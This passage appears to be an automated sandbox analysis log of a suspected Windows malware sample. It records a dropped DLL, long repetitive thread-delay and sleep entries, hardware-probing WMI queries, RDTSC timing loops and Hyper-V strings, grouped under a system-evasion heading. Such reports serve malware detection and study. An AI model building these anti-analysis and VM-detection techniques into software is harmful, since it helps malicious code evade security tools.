            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile created: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeAPI/Special instruction interceptor: Address: 6922E92
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeAPI/Special instruction interceptor: Address: 35E2E92
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeRDTSC instruction interceptor: First address: 68C7DE5 second address: 68C7DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0072AF56h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeRDTSC instruction interceptor: First address: 3587DE5 second address: 3587DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0074E376h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeMemory allocated: 35F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeMemory allocated: 35D10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599007Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598889Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595683Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594914Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594702Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594554Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWindow / User API: threadDelayed 1934Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWindow / User API: threadDelayed 7912Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128Thread sleep count: 1934 > 30Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128Thread sleep count: 7912 > 30Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -599007s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595683s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -594914s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -594702s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -594554s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124Thread sleep time: -594437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0040276E FindFirstFileW,4_2_0040276E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405770
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0040622B FindFirstFileW,FindClose,4_2_0040622B
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 599007Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598889Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595683Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594914Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594702Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594554Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeThread delayed: delay time: 594437Jump to behavior
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}M^
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh3
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeAPI call chain: ExitProcess graph end nodegraph_0-4507
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeAPI call chain: ExitProcess graph end nodegraph_0-4513
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401752
